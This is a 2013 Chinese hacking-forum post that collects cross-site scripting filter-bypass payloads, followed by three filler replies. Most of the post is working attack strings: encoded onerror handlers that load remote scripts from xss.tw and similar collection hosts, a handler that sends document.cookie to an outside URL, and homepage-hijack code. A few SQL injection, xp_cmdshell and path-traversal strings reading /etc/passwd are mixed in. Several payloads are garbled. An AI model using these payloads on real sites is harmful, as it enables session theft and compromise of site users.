搜索
查看: 845|回复: 3

XSS绕过收集

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2013-8-27 10:49:02 | 显示全部楼层 |阅读模式
<a href="javascrip:alert(document.cookie)"> 用a标签来弹窗

"><img src="" onerror="document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(49)+String.fromCharCode(41)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))">  在网页过滤了<script和单引号的情况下可以使用代码绕过,上面write中内容输出的结果是<script>alert(1)</script>   如果想缩短,可以把上面的参数合并,像这样:String.fromCharCode(76,90,83,66);

"><meta http-equiv="Refresh" content="0;url=javascript:document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))> 遇到过滤<script>无法调用js的时候也可以用类似的代码突破,上面代码是跳转url到javascript:document.write("<script src=xxx></script>") 也就是调用js文件xxx 如果想缩短,可以把上面的参数合并,像这样:String.fromCharCode(76,90,83,66);

"><iframe src=javascript:alert(document.cookie); height=0 width=0 />  <iframe>弹窗

<img src=x onerror=appendChild(createElement('script')).src='//js地址' /> img标签来收信

<img/**/src=1/**/onerror="with(document)body.appendChild(createElement('script')).src='脚本地址'" />   过滤了 <script>标签 以及空格 的解决办法

<img src="5" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>  
回显是<img src="5" onerror=eval("alert('xss')")></img>   
如果你要加载脚本请这样:javascript:document.write(unescape(' <script src="脚本地址"></script>')); 修改好后 进行HEX加密再放入eval
注:第一段代码:首先将要执行的 利用Hex 编码 再img 的错误事件 用eval 函数 操控()内的代码!eval 可以计算 并执行 将上面代码解码后便执行了!
第二段加载脚本的:首先是利用 javascript unescape函数 对()内的HEX编码进行解码 然后再通过document.write 在文档对象上面输入()内的内容!
因为()内的内容以及经过unescape的解码 所以输出来后是正常的 如果没有进行解码 那么你输出来的 将会是hex
在这里没有出现 script等危险标签 也没有单引号 所以成功绕过!    过滤了单引号 以及几个危险标签

<script>document.write(String.fromCharCode(在这里写上你的代码));</script>   过滤了等号 单引号 双引号 空格的绕过方法

<img src=1 onerror=&#106&#x61v&#x61scri&#x70&#116:&#97&#108&#x65rt(&#34\x58S\x53\40\x41t\x74\x61\x63\153e\162&#34)>  该过滤的都过滤了

<img src=x onerror=alert(/insight-labs/)>、<p onmouseover=alert(/insight-labs/)>insight-labs、<frameset onload=alert(/insight-labs/)>、<body onload=alert(/insight-labs/)>   事件函数 来弹窗

屏蔽了scaript可以把scaript改成sc%0aript来绕过

"h"+"t"+"t"+"p",绕过对http的过滤

'"><script>alert(/1/)</script><a="
'"><script src=http://x.co/xiHv></script><a="
='><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert('XSS')%3C/script%3E





'"><script src="//x.co/xiHv"></script><a="
'"><script src=//xss.tw/2045></script><a="
'"><script src=//xss.tw/3058></script><a="

&lt;script&nbsp;src=//xss.tw/3058&gt;&lt;/script&gt;
&quot;  引号
&nbsp;  空格
&lt;    <
&gt;    >

无src 无等号  无引号
"></span><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,120,46,99,111,47,120,105,72,118,62,60,47,115,99,114,105,112,116,62));</script><span>
eval(Dec('203041263543203','2549'));



<div style="display:none"></div><div style="display:none"  t="1"  e="style\/&lt;&#39;&quot;&gt;&lt;/div&gt;&quot;/ \&quot;&quot;/&lt;img src=# onerror=eval(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,47,47,120,115,115,46,116,119,47,51,48,53,56,62,60,47,115,99,114,105,112,116,62,32));/\&gt>


<div id="myxsxxcd" style="color:red;display:none" title="if(!window.myxsssxx){window.myxsssxx=123;alert(document.cookie);}">
<DIV><A></A>
<STYLE><!--a{< img src=</STYLE>;x:expression(eval(myxsxxcd.title));<style>}--></style></DIV>


<td width="628" background="/img/index2_r7_c2_r1_c5_s1_s1.jpg">

<img src=x onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,46,116,119,47,51,51,56,49,34))>
<img src=x onerror=eval(String.fromCharCode(document.body.appendChild(createElement("script")).src="http://xss.tw/3381"))>

<img src=x onerror=document.body.appendChild(createElement('script')).src="javascript:alert(/1/)">



<img src=x onerror=&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#98;&#111;&#100;&#121;&#46;&#97;&#112;&#112;&#101;&#110;&#100;&#67;&#104;&#105;&#108;&#100;&#40;&#99;&#114;&#101;&#97;&#116;&#101;&#69;&#108;&#101;&#109;&#101;&#110;&#116;&#40;&#39;&#115;&#99;&#114;&#105;&#112;&#116;&#39;&#41;&#41;&#46;&#115;&#114;&#99;&#61;&#39;&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#120;&#115;&#115;&#56;&#46;&#110;&#101;&#116;&#47;&#63;&#13;&#99;&#61;&#81;&#105;&#104;&#97;&#76;&#39;>

<p><img class="reference" contenteditable="false" data-refid="2" data-type="reference" onerror="eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,56,46,110,101,116,47,63,99,61,81,105,104,97,76,34))" src="http://img.baidu.com/img/baike/editor/reference.gif" unselectable="on" /></p>

eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,56,46,110,101,116,47,63,99,61,81,105,104,97,76,34))



<div class="qm_left" style="position:relative;z-index:2;background:url(//xss.tw/2180) no-repeat 0 0;filter:progidXImageTransform.Microsoft.AlphaImageLoader(src='//xss.tw/2180',sizingMethod='scale');width:40px;height:40px;">

<span class="qm_ico_print" id="mail_print" title="打印" onclick="window.open('/cgi-bin/readmail?sid=SC_hEOi3h_nqEgJQ&amp');"></span>




ECMAScript v3 已从标准中删除了 unescape() 函数,并反对使用它
因此应该用 decodeURI() 和 decodeURIComponent() 取而代之。
通过找到形式为 %xx 和 %uxxxx 的字符序列(x 表示十六进制的数字)
用 Unicode 字符 \u00xx 和 \uxxxx 替换这样的字符序列进行解码。
解密是unescape('%udcdb%uced3%u8d93%u888a%ud58f%u');
加密是escape('%udcdb%uced3%u8d93%u888a%ud58f%ud4c8%udcd9%ud ');

javascript:document.write(unescape('<script src="http://www.xxxx.com/x.js"></script>'));
document.write(String.fromCharCode(60,12,62));  ====  document.write(String.fromCharCode(<script src=http://xss.me/1></script>));






"></span><script>document.write(http://baidu.com)</script><span>





鼠标单击
<a href="http://www.xyydyt.com" style="color:#143d70; simsun;" onclick="alert(/a/);this.style.behavior='url(#default#homepage)';this.setHomePage('http://www.xyydyt.com'); return(false);">asdasdsad</a>


<table background=”javascript:alert(/xss/)”></table>’/在表格中插入脚本

<>过滤用\x3cscript. src=http://www.2cto.com /malicious-code.js\x3e\x3c/script\x3e

<script defer="defer">
var a,b;
a="/";
b="/x.co/xiHv";
window.open(a+b,"","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=500,height=500");
</script>





<% string str_a = rrequest.getParameter("a");%>
var a= <%=str_a%>
document.write(a);

<img src="123">

a.jsp/<script>alert('Vulnerable')</script>
a/
a?<script>alert('Vulnerable')</script>

"><scr&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#120;&#115;&#115;&#39;&#41;&#60;&#47;&#115;&#99;&#114;&#105;pt>

';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
'';!--"<XSS>=&{()}
<IMG src="javascript:alert('XSS');">
<IMG src=javascript:alert('XSS')>
<IMG src=JaVaScRiPt:alert('XSS')>
<IMG src=JaVaScRiPt:alert("XSS")>
<IMG src=javascript:alert('XSS')>
<IMG src=javascript:alert('XSS')>
<IMG src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>


<sRCIpt>alert(/123/)</ScRpT>


<><SPAN class=xmsw title=防火外墙保温材料 onmo&#117;&#115;eout="window.loca&#116;ion='http://www.xfydyt.com'">了解你的产品和行</SPAN></P>




<div style="background-image:url(<script>alert(document.cookie)</script>)">
<div style="background-image:url(javascript:alert(document.cookie))">
<div style="behaviour:url('http://www.how-to-hack.org/exploit.html');">
<div style="width:expression(alert('x123ss'));">

<img src="java&#script:alert(/1231/);">
<img src=javascript:alert(/1231/);>

<img src="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;">
<IMG src="jav ascript:alert('XaSS');">
<IMG src="jav ascript:alert('XbSS');">
<IMG src="jav ascript:alert('XcSS');">
"<IMG src=java\0script:alert(\"XSS\")>";' > out
<IMG src=" javascript:alert('XdSS');">
<SCRIPT>a=/XSfS/alert(a.source)</SCRIPT>
<BODY BACKGROUND="javascript:alert('XeSS')">
<BODY ONLOAD=alert('XgSS')>
<IMG DYNSRC="javascript:alert('XhSS')">
<IMG LOWSRC="javascript:alert('XiSS')">
<BGSOUND src="javascript:alert('XjSS');">

<span onclick="javascript:changeFont(2);">
<SPAN class=xmsw title=dd onmouseout=window.location='http://www,xfydyt.com'>test</span>
<span class="xmsw" title="dd" onmouseout=window.location='http://test/test.php?c='+document.cookie>test</span>
<SPAN class=xmsw title=dd onmouseout=javascript:alert(document.cookie)>test</SPAN>

<br size="&{alert('XkSS')}">
<LAYER src="http://xss.ha.ckers.org/a.js"></layer>
<LINK REL="stylesheet" href="javascript:alert('XlSS');">
<IMG src='vbscript:msgbox("XmSS")'>
<IMG src="mocha:[code]">
<IMG src="livescript:[code]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XoSS');">
<IFR    AME src=javascript:alert('XSnS')></IFRA    ME>
<FRAMESET><FRAME src=javascript:alert('XpSS')></FRAME></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSqS')">
<DIV STYLE="background-image: url(javascript:alert('X1SS'))">
<DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">
<DIV STYLE="width: expression(alert('X2SS'));">
<STYLE>@im\port'\ja\vasc\ript:alert("X3SS")';</STYLE>
<IMG STYLE='xss:expre\ssion(alert("X5SS"))'>
<STYLE TYPE="text/javascript">alert('X4SS');</STYLE>
<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('X6SS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('X7SS')")}</STYLE>
<BASE href="javascript:alert('X8SS');//">
getURL("javascript:alert('X9SS')")
a="get";b="URL";c="javascript:";d="alert('X10SS');";eval(a+b+c+d);
<XML src="javascript:alert('X11SS');">
"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('X12SS');}</SCRIPT><"
<SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
<IMG src="javascript:alert('X13SS')"
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->

<IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>T src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<A href=http://www.gohttp://www.google.com/ogle.com/>link</A>

<DIV STYLE="width:expression(alert('anyunix'));">
<IMG SRC='vbscript:msgbox("anyunix")'>
<STYLE>width:expression(alert('anyunix'));</STYLE>


(1)普通的XSS JavaScript注入
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2)IMG标签XSS使用JavaScript命令
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3)IMG标签无分号无引号
<IMG SRC=javascript:alert('XSS')>

(4)IMG标签大小写不敏感
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5)HTML编码(必须有分号)
<IMG SRC=javascript:alert("XSS")>

(6)修正缺陷IMG标签
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7)formCharCode标签(计算器)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8)UTF-8的Unicode编码(计算器)
<IMG SRC=jav..省略..S')>

(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
<IMG SRC=jav..省略..S')>

(10)十六进制编码也是没有分号(计算器)
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>

(11)嵌入式标签,将Javascript分开
<IMG SRC="jav ascript:alert('XSS');">

(12)嵌入式编码标签,将Javascript分开
<IMG SRC="jav ascript:alert('XSS');">

(13)嵌入式换行符
<IMG SRC="jav ascript:alert('XSS');">

(14)嵌入式回车
<IMG SRC="jav ascript:alert('XSS');">

(15)嵌入式多行注入JavaScript,这是XSS极端的例子
<IMG SRC="javascript:alert('XSS')">

(16)解决限制字符(要求同页面)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

(17)空字符
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19)Spaces和meta前的IMG标签
<IMG SRC=" javascript:alert('XSS');">

(20)Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21)Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22)Non-alpha-non-digit XSS to 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23)双开括号
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24)无结束脚本标记(仅火狐等浏览器)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25)无结束脚本标记2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26)半开的HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27)双开角括号
<iframe src=http://3w.org/XSS.html <

(28)无单引号 双引号 分号
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29)换码过滤的JavaScript
\";alert('XSS');//

(30)结束Title标签
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31)Input Image
<INPUT SRC="javascript:alert('XSS');">

(32)BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33)BODY标签
<BODY('XSS')>

(34)IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35)IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36)BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37)STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38)远程样式表
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39)List-style-image(列表式)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40)IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41)META链接url
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42)Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43)Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44)Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45)TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46)DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">

(48)DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">

(49)STYLE属性分拆表达
<IMG STYLE="xss:expression_r(alert('XSS'))">

(50)匿名STYLE(组成:开角号和一个字母开头)
<XSS STYLE="xss:expression_r(alert('XSS'))">

(51)STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52)IMG STYLE方式
exppression(alert("XSS"))'>

(53)STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54)BASE
<BASE HREF="javascript:alert('XSS');//">

(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56)在flash中使用ActionScrpt可以混进你XSS的代码
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval_r(a+b+c+d);

(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
<SCRIPT SRC=""></SCRIPT>

(59)IMG嵌入式命令,可执行任意命令
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60)IMG嵌入式命令(a.jpg在同服务器)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61)绕符号过滤
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>T SRC="http://3w.org/xss.js"></SCRIPT>

(68)URL绕行
<A HREF="http://127.0.0.1/">XSS</A>

(69)URL编码
<A HREF="http://3w.org">XSS</A>

(70)IP十进制
<A HREF="http://3232235521″>XSS</A>

(71)IP十六进制
<A HREF="http://0xc0.0xa8.0×00.0×01″>XSS</A>

(72)IP八进制
<A HREF="http://0300.0250.0000.0001″>XSS</A>

(73)混合编码
<A HREF="h
tt p://6 6.000146.0×7.147/"">XSS</A>

(74)节省[http:]
<A HREF="//www.google.com/">XSS</A>

(75)节省[www]
<A HREF="http://google.com/">XSS</A>

(76)绝对点绝对DNS
<A HREF="http://www.google.com./">XSS</A>

(77)javascript链接
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>



Code: <INPUT TYPE="IMAGE" SRC="javascript:alert(XSS);">
Code: <BODY BACKGROUND="javascript:alert(XSS)">
Code: <BODY ONLOAD=alert(XSS)>
Code: <IMG DYNSRC="javascript:alert(XSS)">
Code: <BGSOUND SRC="javascript:alert(XSS);">
Code: <BR SIZE="&{alert(XSS)}">  (netspace)
Code: <LINK REL="stylesheet" HREF="javascript:alert(XSS);">
Code: <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
Code: <STYLE>@importhttp://ha.ckers.org/xss.css;</STYLE>
Code: <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
Code: <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
Code: <XSS STYLE="behavior: url(xss.htc);">
Code: <STYLE>li {list-style-image: url("javascript:alert(XSS)");}</STYLE><UL><LI>XSS
Code: <IMG SRC="mocha:[code]"> (netscape only)
Code: <IMG SRC="livescript:[code]"> (netscape only)
Code: <TABLE BACKGROUND="javascript:alert(XSS)">
Code: <IFRAME SRC="javascript:alert(XSS);"></IFRAME>
Code: <TABLE><TD BACKGROUND="javascript:alert(XSS)">
Code: <DIV STYLE="background-image: url(javascript:alert(XSS))">
Code: <BASE HREF="javascript:alert(XSS);//">

US_ASCII编码(库尔特发现)。使用7位ascii编码代替8位,可以绕过很多过滤。但是必须服务器是以US-ASCII编码交互的。目前仅发现Apache Tomcat是以该方式交互。
Code: ?scriptualert(EXSSE)?/scriptu

META协议
Code:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(XSS);">
Code: <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
Code: <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(XSS);">

对DIV进行unicode编码
Code: <DIV STYLE="background-image: 075 072 06C 028 06a 061 076 061 073 063 072 069 070 074 03a 061 06c 065 072 074 028.1027 058.1053 053 027 029 029">

使用expression属性
Code: <DIV STYLE="width: expression(alert(XSS));">

STYLE标签
Code:<STYLE>@importjavasc ipt:alert("XSS");</STYLE>
Code: <STYLE TYPE="text/javascript">alert(XSS);</STYLE>
Code: <STYLE>.XSS{background-image:url("javascript:alert(XSS)");}</STYLE><A CLASS=XSS></A>
Code: <STYLE type="text/css">BODY{background:url("javascript:alert(XSS)")}</STYLE>

OBJECT标签
Code: <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
Code: <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(XSS)></OBJECT>

EMBED标签
Code: <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
Code: <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
在flash文件中使用如下代码:
Code: a="get";
b="URL("";
c="javascript:";
d="alert(XSS);")";
eval(a+b+c+d);

XML namespace可以引入行为文件htc但是必须在同一服务器上
Code: <HTML xmlns:xss>
  <?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
  <xss:xss>XSS</xss:xss>
</HTML>
Xss.htc: <UBLIC:COMPONENT TAGNAME="xss">
   <UBLIC:ATTACH EVENT="ondocumentready" ONEVENT="main()" LITERALCONTENT="false"/>
</PUBLIC:COMPONENT>
<SCRIPT>
   function main()
   {
     alert("XSS");
   }
</SCRIPT>

使用CDATA模糊化的XML数据岛
Cdoe: <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(XSS);">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

XML数据岛
Code:<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert(XSS)
专业回帖 该用户已被删除
发表于 2013-8-29 17:25:08 | 显示全部楼层
好好 学习了 确实不错
专业回帖 该用户已被删除
发表于 2013-8-29 22:50:48 | 显示全部楼层
小手一抖,钱钱到手!
ming 该用户已被删除
发表于 2013-9-6 22:48:28 | 显示全部楼层
回帖好品质
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表